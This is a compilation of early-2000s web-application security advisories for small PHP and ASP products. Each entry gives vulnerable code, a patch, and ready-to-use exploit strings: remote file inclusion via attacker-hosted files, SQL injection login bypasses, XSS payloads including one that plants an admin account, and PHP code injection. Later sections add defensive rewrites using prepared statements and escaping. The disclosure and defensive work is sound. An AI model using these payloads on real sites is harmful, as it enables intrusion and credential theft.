3) cos of the above, the file viewtopic.php doesn't check at all, so you can insert some html in the script's output:
http://hostname.com/phorum/viewtopic.php?id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
[it must be in a single string]
a not URL-encoded string works fine also.

ps. all of these issues apply to previous versions of upb.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! and kate for she is kewl girl ))
fuck_off: slavomira and other dirty ppl in *.kz

im not a lame, not yet a hacker

frog-m@n
Thatware (PHP)
Informations :
Versions : ? - 0.3 - 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection

PHP Code/Location :

artlist.php (v0.5.2, 0.5.3) :
-
include $root_path.'thatfile.php';
-

config.php (v? - 0.3 - 0.5.3) :
-
include $root_path."db_settings.php";
-

thatfile.php (v? - 0.3 - 0.5.2) :
-
if (!IsSet($thatfile)) {
    include($root_path."config.php");
    if (!IsSet($translation_set)) {
        include $root_path."messages.$language.php";
    } #Translation module, even for english needed!
-

auth.inc.php (v? - 0.3 - 0.5.0) :
-
$admintest = 0;
$mod_ok = 0;
$moderator = 0;
if(isset($user)) {
    if (!$thatfile) include("thatfile.php");
    $admin = base64_decode($user);
    $admin = explode(":", $admin);
    if (empty($admin[0]) || empty($admin[2])) exit;
    $aid = $admin[1];
    dbconnect();
    $result=mysql_query("select rights from users where uid='$admin[0]' and pass='$admin[2]'");
    if(!$result) {
        echo "Oh oh... select from database failed for admin check";
        exit;
    } else {
        list($auth_rights)=mysql_fetch_row($result);
        $auth_rights=explode(",",$auth_rights);
        if (!empty($auth_rights)) {
            $admintest=1;
            if (inarray($auth_rights, 4)||inarray($auth_rights, 1)) {
                $moderator=1;
                $mod_ok=1;
            }
        }
    }
}
-

Exploits :

v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with http://[attacker]/thatfile.php

v? - 0.3 - 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with http://[attacker]/db_settings.php

v? - 0.3 - 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/&language=1
with http://[attacker]/config.php and http://[attacker]/messages.1.php

v? - 0.3 - 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode("JyBPUiAnJz0nOjE6JyBPUiAnJz0n") == "' OR ''=':1:' OR ''='" )

Patches :
0.5.3: http://www.phpsecure.org/patch/dl.php?id=47
0.5.2: http://www.phpsecure.org/patch/dl.php?id=51
0.5.0: http://www.phpsecure.org/patch/dl.php?id=50
0.4.5: http://www.phpsecure.org/patch/dl.php?id=52
0.4.4: http://www.phpsecure.org/patch/dl.php?id=49
0.4.3: http://www.phpsecure.org/patch/dl.php?id=48
0.4.2: http://www.phpsecure.org/patch/dl.php?id=53
0.4.1: http://www.phpsecure.org/patch/dl.php?id=54
0.4: http://www.phpsecure.org/patch/dl.php?id=55
0.3: http://www.phpsecure.org/patch/dl.php?id=56

More details :
In French : http://www.frog-man.org/tutos/Thatware.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
FreeNews & News Evolution (PHP)
Informations :
Problem : Include files

a)
---
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
---
b)
---
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
---

PHP Code/Location :

a) freenews 2.1

aff_news.php :
-
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-
...

b) News Evolution 1.0

aff_news.php :
-
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-
moteur/moteur.php :
--
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--
export_news.php :
---
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---
...

c) News Evolution 2.0

backend.php :
-
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
-
screen.php :
-
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
-
admin/modules/comment.php :
-
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
-
...

Exploits :

a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...

b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...

c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
...

Patch :
http://www.phpsecure.org

More details :
In French : http://www.frog-man.org/tutos/NEfree.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
Immobilier 1 (PHP)
Informations :
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection

PHP Code/Location :

agentadmin.php :
--
[...]
} elseif ($agentname != "" OR $current_user != "") {
    $sql = "SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'";
    $result = mysql_query($sql) or die("Couldn't execute query.");
    $num = mysql_numrows($result);
    if ($num == 1) {
        session_register("agentname");
        session_register("agentpassword");
        [...]
        session_register("current_user");
        session_register("agent");
[...]
--

admin/phpinfo.php :
---
<?php phpinfo(); ?>
---

Exploits :
http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]&agentpassword='%20OR%20''='

http://[target]/admin/phpinfo.php

Solutions :
- Delete /admin/phpinfo.php
- Put these lines :
--
$agentname=addslashes($agentname);
$current_user=addslashes($current_user);
$agentpassword=addslashes($agentpassword);
--
into common.php.
A patch can be found on http://www.phpsecure.org.

More details :
In French : http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
Web Server Creator - Web Portal 0.1 (PHP)
Informations :
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file

PHP Code/Location :

news/include/customize.php :
--
<?php
$langfile = $l;
include $l;
?>
--

index.php :
---
[...]
if (!$pg) {
    $pg = "acceuil";
}
[...]
require ($pg.".php");
?>
[...]
---

Exploits :
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with http://[attacker]/file.txt
and
http://[target]/index.php?pg=http://[attacker]/badfile
with http://[attacker]/badfile.php

Solution :
- Delete the bugged lines in news/include/customize.php
- In index.php replace this line :
require ($pg.".php");
by :
---
if (file_exists($pg.".php")){
    require ($pg.".php");
}
---
A patch can be found on http://www.phpsecure.org.

More details :
In French : http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
dobermann FORUM (php)
Informations :
Product : dobermann FORUM
Version : 0.5
Website : http://www.le-dobermann.com
Problem : Include file

PHP Code/Location :

entete.php, enteteacceuil.php, topic/entete.php :
--
<?php include $subpath."banniere.php"; ?>
--

index.php, newtopic.php :
--
require "config.php";
include("entete.php");
--

Exploits :
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with http://[attacker]/banniere.php

Patch :
In the files :
--
entete.php
enteteacceuil.php
topic/entete.php
--
replace the line :
--
<?php include $subpath."banniere.php"; ?>
--
by :
--
<?php
$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
    include $banfile;
}
?>
--

More details in French : http://www.frog-man.org/tutos/dobermannFORUM.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
gBook
Informations :
Language : PHP
Tested version : 1.4
Problem : Admin access

PHP Code :

/gb/index.php :
--
<?php
include("config.inc.php");
if($action == "login") {
    if($user == $loginu && $pw == $loginpw) {
        setcookie("login", true, time()+3600);
        header("location: index.php");
    } else {
        setcookie("login", false, -3600);
        header("location: index.php?fehler=login");
    }
}
?>
[...]
<?php
if($login == true) {
    [ADMIN CODE]
[...]
--

Exploit :
http://[Target]/gb/index.php?login=true

Patch :
Use .htaccess.

More details in French : http://www.frog-man.org/tutos/gBook.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
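The login code in SPGpartenaires, MyPHPLinks, Thatware, Immobilier and gBook above fails in two ways: the credentials are concatenated into the SQL text, so a quote in the input rewrites the WHERE clause, and the proof of login handed to the browser is either the credentials themselves (the SPGP cookie holds id||pass) or a flag the client can simply set (gBook's login=true). The advisories patch the first with addslashes(); that depends on the connection character set and on whether magic_quotes has already escaped the value, whereas a bound parameter never becomes part of the SQL text at all. The following is an added example, not code from any of these projects: a login function using mysqli prepared statements and password_verify(), and a session-based check that keeps only an opaque session id on the client. The table and column names, and the connection credentials, are hypothetical.

```php
<?php
// Added example (not SPGpartenaires, MyPHPLinks, Thatware, Immobilier or gBook
// code). Assumes a hypothetical table members(id, nomsite, password_hash)
// whose password_hash column was produced with password_hash().

function authenticate(mysqli $db, string $id, string $password): ?array
{
    // The SQL text is fixed; $id travels as a separate parameter, so an input
    // such as "' OR ''='" is compared as a literal id and matches nothing.
    $stmt = $db->prepare('SELECT id, nomsite, password_hash FROM members WHERE id = ? LIMIT 1');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // The password is checked against a stored hash, never stored or compared
    // in clear text, and never written into a cookie.
    if ($row === null || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

function login_and_start_session(mysqli $db, string $id, string $password): bool
{
    $member = authenticate($db, $id, $password);
    if ($member === null) {
        return false;
    }
    // Server-side session instead of SPGP=id||pass or login=true: the browser
    // only receives a random session id, and a fresh one is issued on login.
    session_regenerate_id(true);
    $_SESSION['member'] = $member;
    return true;
}

// What the protected pages (delete.php, modif.php, ...) call instead of
// re-running the SQL with values taken from a cookie.
function require_login(): array
{
    if (empty($_SESSION['member'])) {
        header('Location: index.php?msg=Veuillez+vous+identifier+!');
        exit;
    }
    return $_SESSION['member'];
}

// Usage in the login script (connection details are placeholders).
session_start();
$db = new mysqli('localhost', 'app_user', 'app_password', 'app_db');
if (isset($_POST['id'], $_POST['pass'])) {
    if (login_and_start_session($db, (string) $_POST['id'], (string) $_POST['pass'])) {
        header('Location: index2.php');
    } else {
        header('Location: index.php?msg=Identification+incorrecte+!');
    }
    exit;
}
```

Reading the credentials from $_POST rather than from a bare $id or $SPGP global also removes the register_globals path the advisories rely on, where a cookie, query parameter and POST field all land in the same variable.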
phpnewsDev
Informations :
Language : PHP
Tested version : 1
Problem : bad use of include()

PHP Code :

Include/variables.php3 :
---
<?php
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage=2000;
$MoisDeDemarrage=8;
$NbNouvelles=5;
require("$Include/french.inc");
?>
---
and Include/lib.inc.php3 :
---
include("$Include/config.inc.php3");
---

Exploits :
http://[target]/variables.php3?Include=http://[attacker]
with, in the file http://[attacker]/french.inc :
---
<?php
print("<center><u>MySQL Infos</u></center>\n\nServeur: $Mac \nLogin: $Uti \nPass: $Mot \nDB Name: $Bd");
?>
---
and
http://[target]/Include/lib.inc.php3?http://[attacker]
with bad PHP code in the file http://[attacker]/config.inc.php3

Patch :
Add to the beginning of :
--
Include/lib.inc.php3
Include/variables.php3
--
the line :
$Include="Include";

More details in French : http://www.frog-man.org/tutos/phpnewsDev.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
SSGbook (ASP)
Informations :
Product : SSGbook
Language : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting

ASP Code / location :

config.asp :
--
fString = doCode(fString, "[img]", "[/img]", "<img src=""", """ border=0>")
fString = doCode(fString, "[image]", "[/image]", "<img src=""", """ border=0>")
fString = doCode(fString, "[img=right]", "[/img=right]", "<img align=right src=""", """ id=right border=0>")
fString = doCode(fString, "[image=right]", "[/image=right]", "<img align=right src=""", """ id=right border=0>")
fString = doCode(fString, "[img=left]", "[/img=left]", "<img align=left src=""", """ id=left border=0>")
fString = doCode(fString, "[image=left]", "[/image=left]", "<img align=left src=""", """ id=left border=0>")
--

Exploit :
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]

e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
This adds an admin account when an admin reads it. Login : Pom, Password : turlututu

Patch :
In config.asp :

Add this line :
strOutput = Replace(strOutput, chr(34), "&quot;")
after
--
strOutput = Replace(strOutput, "<", "&lt;")
strOutput = Replace(strOutput, ">", "&gt;")
--

And replace these lines :
--
fString = doCode(fString, "[img]", "[/img]", "<img src=""", """ border=0>")
fString = doCode(fString, "[image]", "[/image]", "<img src=""", """ border=0>")
fString = doCode(fString, "[img=right]", "[/img=right]", "<img align=right src=""", """ id=right border=0>")
fString = doCode(fString, "[image=right]", "[/image=right]", "<img align=right src=""", """ id=right border=0>")
fString = doCode(fString, "[img=left]", "[/img=left]", "<img align=left src=""", """ id=left border=0>")
fString = doCode(fString, "[image=left]", "[/image=left]", "<img align=left src=""", """ id=left border=0>")
--
by :
--
fString = doCode(fString, "[img]http://", "[/img]", "<img src=""http://", """ border=0>")
fString = doCode(fString, "[image]http://", "[/image]", "<img src=""http://", """ border=0>")
fString = doCode(fString, "[img=right]http://", "[/img=right]", "<img align=right src=""http://", """ id=right border=0>")
fString = doCode(fString, "[image=right]http://", "[/image=right]", "<img align=right src=""http://", """ id=right border=0>")
fString = doCode(fString, "[img=left]http://", "[/img=left]", "<img align=left src=""http://", """ id=left border=0>")
fString = doCode(fString, "[image=left]http://", "[/image=left]", "<img align=left src=""http://", """ id=left border=0>")
--

More details in French : http://www.frog-man.org/tutos/SSGbook.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
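The SSGbook patch above combines two ideas that also answer the OpenTopic [IMG] issue earlier on this page: the double quote is entity-encoded so a value cannot close the src attribute and add its own (the OpenTopic vector), and the tag only matches when the value starts with http://, so a javascript: scheme cannot reach the attribute (the SSGbook vector). The following is an added example, not code from either product, that implements the same two rules in PHP for a minimal [img] / [img=left|right] BBCode: the whole text is entity-encoded first, and an <img> is only emitted when the decoded value is a well-formed absolute http(s) URL; otherwise the tag is left as visible text. The function name and the sample inputs are constructed.

```php
<?php
// Added example (not SSGbook or OpenTopic code). Renders a restricted BBCode
// subset: [img]URL[/img] and [img=left|right]URL[/img=left|right].

function bbcode_img_to_html(string $text): string
{
    // Rule 1: encode everything first. ENT_QUOTES also covers the single
    // quote, which htmlspecialchars() leaves alone by default.
    $html = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    return preg_replace_callback(
        '/\[img(?:=(left|right))?\]([^\[]+)\[\/img(?:=(?:left|right))?\]/i',
        function (array $m): string {
            $align = strtolower($m[1]);
            // The captured URL is entity-encoded; decode it to validate the real value.
            $url = html_entity_decode($m[2], ENT_QUOTES, 'UTF-8');

            // Rule 2: only an absolute http(s) URL with no quotes, whitespace
            // or angle brackets may become an attribute value. javascript:,
            // vbscript: and data: schemes fail the scheme check; an injected
            // quote or space fails the character class.
            if (!preg_match('#^https?://[^\s"\'<>]+$#i', $url)
                || filter_var($url, FILTER_VALIDATE_URL) === false) {
                return $m[0];   // leave the tag as harmless text
            }

            $attr = 'src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" border="0"';
            if ($align !== '') {
                $attr .= ' align="' . $align . '"';
            }
            return '<img ' . $attr . '>';
        },
        $html
    );
}

// Constructed inputs: one well-formed tag, one with a script scheme, one that
// tries to close the attribute and add an event handler.
$samples = [
    '[img]http://example.invalid/pic.gif[/img]',
    '[img=left]javascript:alert(1)[/img=left]',
    '[img]http://example.invalid/a.gif" onmouseover="alert(1)[/img]',
];
foreach ($samples as $s) {
    echo bbcode_img_to_html($s), "\n";
}
```

Only the first sample produces an <img> element. The second keeps its javascript: value as inert text, and in the third the injected quote has already become &quot; before the regex sees it, so the URL check fails and no attribute is ever built from it. Allowing only a fixed vocabulary of attribute values, as this does for align, is what makes the output safe regardless of how the browser tolerates malformed markup.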
phpSecurePages & Killer Protection (PHP)
1) Informations :
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file

PHP Code :

checklogin.php :
--
if (!$login) { // no login available
    include($cfgProgDir . "interface.php");
    exit;
}
if (!$password) { // no password available
    $message = $strNoPassword;
    include($cfgProgDir . "interface.php");
    exit;
}
--

Exploit :
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with http://[attacker]/interface.php .

Patch :
Add this :
$cfgProgDir = './';
at the beginning of checklogin.php .

More details in French : http://www.frog-man.org/tutos/phpSecurePages.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

2) Informations :
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Information disclosure

Exploit :
http://[target]/vars.inc
and
http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD]

Patch :
Rename vars.inc to vars.inc.php .
In protection.php, replace require("vars2.inc"); by require("vars2.inc.php");

More details in French : http://www.frog-man.org/tutos/KillerProtection.txt
Translated by Google : http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
phpMyNewsletter
Informations :
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :

/include/customize.php :
--
<?php
$langfile = $l;
include $l;
?>
--

Exploit :
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
with, in http://[attacker]/code.txt :
--
<?php echo $text; ?>
--
or
http://[target]/include/customize.php?l=../path/file/to/view

Patch :
The author has been alerted and the latest version (0.7beta1) has been patched.

More details
- in French : http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
Multiple Web Security Holes
I sent this three times to webappsec but without results. So I am trying bugtraq, although that is less appropriate.

Five products in PHP are vulnerable to various holes.

1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3.0
Problem : DB information disclosure

config.inc is not handed to PHP by the web server, so it is served as plain text; a script on another host can include() it and read the database credentials it defines.

Exploit :
<?php
$victime = "http://[target]";
include("$victime/config.inc");
print("Database info for site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer : $DB_Database");
?>

2) PY-Membres
Website : http://py-scripts.levillage.org/
Tested Version : 3.1
Problem : Access to all accounts

Exploit :
http://[target]/index.php?pymembs=admin
http://[target]/index.php?pymembs=[USER]

Problem :
<?php
if ($pymembs) {
    $login = $pymembs;
    session_start();
    session_register('login');
} else {
    session_start();
}
[...]
if (!session_is_registered('login')) {
?>
[...]

Any request carrying pymembs registers that value as the session's login; the later check only tests that a login is registered, not that a password was ever verified, so any account name gives a logged-in session.

3) upb PB
Website : http://www.webrc.ca/
Tested Version : 1.0b
Problem : information disclosure

Exploit :
http://[target]/db/users.dat

4) MidiCart PHP
Website : http://www.midicart.com
Version : 1
Problems : information disclosure, upload

Exploit :
http://{target}/admin/credit_card_info.php
http://{target}/admin/upload.php

5) Pphlogger
Website : http://www.phpee.com
Tested Versions : 2.0.9, 2.2.1, 2.2.2a
Problem : include file

Exploit :
http://[target]/showhits.php3?rel_path=http://[attacker]
with http://[attacker]/main_location.inc or http://[attacker]/config.inc.php3 or http://[attacker]/get_userdata.php3

Problem :
if (!isset($rel_path)) $rel_path = "";
include $rel_path . "config.inc.php3";
include $rel_path . "get_userdata.php3";

For more details and patches :
In French : http://www.frog-man.org/tutos/5holes10.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

Sorry for my poor English.

frog-m@n
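The PY-Membres hole (item 2 above) is an identity that is set from a request parameter and then trusted for the rest of the session. As an added example, not PY-Membres' own code, here is the same login written so that the session only ever records an identity after a password has been verified. The members table, its password_hash column and the SQLite DSN are this example's assumptions.

```php
<?php
// Added example (not PY-Membres' own code): why the pymembs bypass works and
// the shape of a login that does not trust a request value as identity.
//
// Vulnerable pattern, as in PY-Membres 3.1 index.php:
//
//     if ($pymembs) {
//         $login = $pymembs;         // straight from the request
//         session_start();
//         session_register('login'); // session now says "I am $pymembs"
//     }
//     ...
//     if (!session_is_registered('login')) { /* deny */ }
//
// The only thing checked later is that a login is registered, not that a
// password was ever verified, so ?pymembs=admin is a full login as admin.

// Assumption: a members table reachable through PDO, with a column holding
// password_hash() output. Table name and DSN are this example's choices.
function login(PDO $db, string $user, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM members WHERE login = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a real credential; a missing user and a bad password
    // are indistinguishable to the caller.
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }

    // Identity is set only here, after verification, and the session id is
    // rotated so a session fixed before login does not carry the privilege.
    session_regenerate_id(true);
    $_SESSION['login'] = $user;
    return true;
}

function current_user(): ?string
{
    // Read identity only from the server-side session, never from $_GET,
    // $_POST, $_COOKIE or a register_globals-populated variable.
    return $_SESSION['login'] ?? null;
}

session_start();

if (isset($_POST['login'], $_POST['password'])) {
    // Assumption: DSN for a local SQLite file; replace with the site's own.
    $db = new PDO('sqlite:' . __DIR__ . '/members.sqlite');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    if (!login($db, (string) $_POST['login'], (string) $_POST['password'])) {
        http_response_code(401);
        exit('bad credentials');
    }
}

if (current_user() === null) {
    http_response_code(403);
    exit('login required');
}
echo 'logged in as ' . htmlspecialchars(current_user(), ENT_QUOTES, 'UTF-8');
```

The property that matters is that there is exactly one assignment to $_SESSION['login'] in the application and it is unreachable without password_verify() returning true; a ?login=admin or ?pymembs=admin parameter then has no path into the session at all.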
MySimpleNews (PHP)
Informations :
°°

Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.

a) Writing PHP code into a PHP file and execution of this code.

Problem :
°

-- users.php --
<?php
$fp = fopen("news.php3", "a");
fwrite($fp, "Posté Par [$LOGIN]\n");   // "Posted by"
fwrite($fp, "Le $DATA\n<br>");         // "On <date>"
fwrite($fp, "$MESS\n<hr>");
fclose($fp);
?>
-- users.php --

The three request values are appended unescaped to news.php3, a file the server executes, so a PHP open tag in any of them runs on the server the next time news.php3 is requested.

Exploit :
°

http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]

Execution : http://[target]/news.php3

b) Recovery of the admin's password.

Problem :
°

-- admin.html --
moncode = prompt('MySimpleNews - Administration', '');
if (moncode != "[PASSWORD]") {
    location.href = "about:Erreur 403";
}
-- admin.html --

The password is compared on the client side, so it is present in the page source.

Exploit :
°

view-source:http://[target]/admin.html

c) Deleting news.

Problem :
°

No security in the file.

Exploit :
°

http://[target]/vider.php3

Patch :
°°°

Use of .htaccess.

More details in French : http://www.frog-man.org/tutos/MySimpleNews.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
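Point (a) above is the general mistake of writing untrusted text into a file the server will later execute. As an added example, not MySimpleNews' own code, here is the same "append a news item and display the list" feature written so that submitted text is stored as data and escaped only at output time; the data file location and JSON-lines layout are this example's assumptions.

```php
<?php
// Added example (not MySimpleNews' own code): the same "append a news item"
// feature written so that submitted text can never execute on the server.
//
// Vulnerable pattern, as in users.php:
//
//     $fp = fopen("news.php3", "a");
//     fwrite($fp, "$MESS\n<hr>");   // raw request data into a .php3 file
//
// news.php3 is executed by PHP on every request, so a message containing a
// PHP open tag is remote code execution on the next page load.

// Assumption: news is kept as JSON lines in a data file that the web server
// never serves or executes (outside the document root). Path is this
// example's choice.
const NEWS_FILE = __DIR__ . '/../data/news.jsonl';

/** Append one item. The data file holds data only; no PHP is ever written. */
function add_news(string $author, string $date, string $message): void
{
    $record = json_encode(
        ['author' => $author, 'date' => $date, 'message' => $message],
        JSON_THROW_ON_ERROR
    );
    // LOCK_EX: concurrent posts do not interleave half-written lines.
    file_put_contents(NEWS_FILE, $record . "\n", FILE_APPEND | LOCK_EX);
}

/** Render every item as HTML, escaping at output time. */
function render_news(): string
{
    if (!is_file(NEWS_FILE)) {
        return '';
    }
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    $out = '';
    foreach (file(NEWS_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $item = json_decode($line, true);
        if (!is_array($item)) {
            continue;   // skip a corrupt line rather than trust it
        }
        // Even a message containing a PHP open tag or <script> is inert text
        // here, and it was never inside an executed file to begin with.
        $out .= '<p>Posted by ' . $e((string) ($item['author'] ?? ''))
              . ' on ' . $e((string) ($item['date'] ?? '')) . '</p><p>'
              . nl2br($e((string) ($item['message'] ?? ''))) . '</p><hr>';
    }
    return $out;
}

// Handling a submission: fields are read explicitly from $_POST, not from
// globals that register_globals may have set.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Assumption: a server-side authentication check has already run before
    // this point; the original has none, which is the advisory's point (c).
    add_news(
        (string) ($_POST['LOGIN'] ?? 'anonymous'),
        date('Y-m-d H:i'),      // server clock, not a request field
        (string) ($_POST['MESS'] ?? '')
    );
}
echo render_news();
```

Two things change relative to users.php: the file being appended to is never interpreted by PHP, and the date comes from the server rather than the DATA parameter, which removes one of the three injection points outright. Point (b) needs the same treatment as any client-side check, namely moving the password comparison to the server.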
